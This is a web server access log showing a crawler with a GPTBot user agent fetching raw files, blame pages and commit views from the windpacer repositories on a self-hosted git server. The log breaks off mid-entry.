[Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/struct.pyc" -[17/Feb/2026:14:44:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 4858] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:14:44:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/struct.pyc" [Client 74.7.227.38] [Length 305] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/struct.pyc" -[17/Feb/2026:14:44:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/struct.pyc" [Client 74.7.227.38] [Length 9892] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/struct.pyc" -[17/Feb/2026:14:44:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/struct.pyc" [Client 74.7.227.38] [Length 11018] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/struct.pyc" -[17/Feb/2026:14:44:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/struct.pyc" [Client 74.7.227.38] [Length 305] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/struct.pyc" -[17/Feb/2026:14:44:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 21822] [Gzip 12.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:14:44:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?files=html%2fassets%2fjs%2fi18n.js" [Client 74.7.227.38] [Length 23299] [Gzip 4.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/js/i18n.js" -[17/Feb/2026:14:45:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec...main?show-outdated=&style=split&whitespace=show-all" [Client 74.7.227.38] [Length 317776] [Gzip 14.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec...main" -[17/Feb/2026:14:45:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/keys.json" [Client 74.7.227.38] [Length 11801] [Gzip 2.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/keys.json" -[17/Feb/2026:14:45:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03?show-outdated=&style=split&whitespace=ignore-eol" [Client 74.7.227.38] [Length 30219] [Gzip 7.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03?show-outdated=&style=unified&whitespace=ignore-eol" -[17/Feb/2026:14:45:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03?show-outdated=&style=split&whitespace=ignore-all" [Client 74.7.227.38] [Length 30215] [Gzip 7.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03?show-outdated=&style=unified&whitespace=ignore-all" -[17/Feb/2026:14:45:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/project.assets.json" [Client 74.7.227.38] [Length 37207] [Gzip 11.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj" -[17/Feb/2026:14:45:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2fletsencrypt%2frenewal" [Client 74.7.227.38] [Length 24908] [Gzip 5.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal" -[17/Feb/2026:14:45:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/pages/DCS.html" [Client 74.7.227.38] [Length 22686] [Gzip 7.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/pages" -[17/Feb/2026:14:45:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/Dockerfile?display=rendered" [Client 74.7.227.38] [Length 10884] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/Dockerfile" -[17/Feb/2026:14:45:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/" [Client 74.7.227.38] [Length 48] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/forks" -[17/Feb/2026:14:45:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot" [Client 74.7.227.38] [Length 14724] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/" -[17/Feb/2026:14:45:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/18fa480c84b358da8bf50d54057f53591759225f.diff" [Client 74.7.227.38] [Length 993] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/18fa480c84b358da8bf50d54057f53591759225f" -[17/Feb/2026:14:45:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2?files=html%2fassets%2fjs" [Client 74.7.227.38] [Length 18602] [Gzip 3.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/js" -[17/Feb/2026:14:45:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec...main?show-outdated=&style=unified&whitespace=ignore-change" [Client 74.7.227.38] [Length 288849] [Gzip 12.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec...main" -[17/Feb/2026:14:45:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.1%20copy.py" [Client 74.7.227.38] [Length 20335] [Gzip 6.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" -[17/Feb/2026:14:45:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.1%20copy.py" [Client 74.7.227.38] [Length 20304] [Gzip 6.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor" -[17/Feb/2026:14:45:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.1%20copy.py" [Client 74.7.227.38] [Length 20331] [Gzip 6.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" -[17/Feb/2026:14:45:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/project.assets.json" [Client 74.7.227.38] [Length 52830] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/project.assets.json" -[17/Feb/2026:14:45:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/project.assets.json" [Client 74.7.227.38] [Length 48969] [Gzip 21.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/project.assets.json" -[17/Feb/2026:14:45:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/pages/DCS.html" [Client 74.7.227.38] [Length 9853] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/pages/DCS.html" -[17/Feb/2026:14:45:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/pages/DCS.html" [Client 74.7.227.38] [Length 25634] [Gzip 12.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/pages/DCS.html" -[17/Feb/2026:14:45:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/pages/DCS.html" [Client 74.7.227.38] [Length 21975] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/pages/DCS.html" -[17/Feb/2026:14:45:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props" [Client 74.7.227.38] [Length 11755] [Gzip 3.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj" -[17/Feb/2026:14:45:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets" [Client 74.7.227.38] [Length 11571] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj" -[17/Feb/2026:14:45:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/Dockerfile?display=rendered" [Client 74.7.227.38] [Length 10884] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/Dockerfile" -[17/Feb/2026:14:45:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.1%20copy.py" [Client 74.7.227.38] [Length 9917] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.1%20copy.py" -[17/Feb/2026:14:45:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.1%20copy.py" [Client 74.7.227.38] [Length 9279] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.1%20copy.py" -[17/Feb/2026:14:45:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.1%20copy.py" [Client 74.7.227.38] [Length 21659] [Gzip 10.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.1%20copy.py" -[17/Feb/2026:14:45:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.1%20copy.py" [Client 74.7.227.38] [Length 9916] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.1%20copy.py" -[17/Feb/2026:14:45:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.1%20copy.py" [Client 74.7.227.38] [Length 9888] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.1%20copy.py" -[17/Feb/2026:14:45:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.1%20copy.py" [Client 74.7.227.38] [Length 21664] [Gzip 10.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.1%20copy.py" -[17/Feb/2026:14:45:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.1%20copy.py" [Client 74.7.227.38] [Length 9279] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.1%20copy.py" -[17/Feb/2026:14:45:19 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/pages/assets/js/script.js" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/pages/DCS.html" -[17/Feb/2026:14:45:19 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/pages/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/pages/DCS.html" -[17/Feb/2026:14:45:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.1%20copy.py" [Client 74.7.227.38] [Length 9279] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.1%20copy.py" -[17/Feb/2026:14:45:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.1%20copy.py" [Client 74.7.227.38] [Length 21631] [Gzip 10.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.1%20copy.py" -[17/Feb/2026:14:45:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props" [Client 74.7.227.38] [Length 9907] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props" -[17/Feb/2026:14:45:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets" [Client 74.7.227.38] [Length 10589] [Gzip 3.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets" -[17/Feb/2026:14:45:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets" [Client 74.7.227.38] [Length 1084] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets" -[17/Feb/2026:14:45:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props" [Client 74.7.227.38] [Length 1112] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props" -[17/Feb/2026:14:45:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets" [Client 74.7.227.38] [Length 9907] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets" -[17/Feb/2026:14:45:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props" [Client 74.7.227.38] [Length 10843] [Gzip 3.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props" -[17/Feb/2026:14:45:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/Dockerfile?display=source" [Client 74.7.227.38] [Length 11594] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/Dockerfile" -[17/Feb/2026:14:45:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 11403] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest" -[17/Feb/2026:14:45:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/main.py" [Client 74.7.227.38] [Length 10343] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/main.py" -[17/Feb/2026:14:45:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr 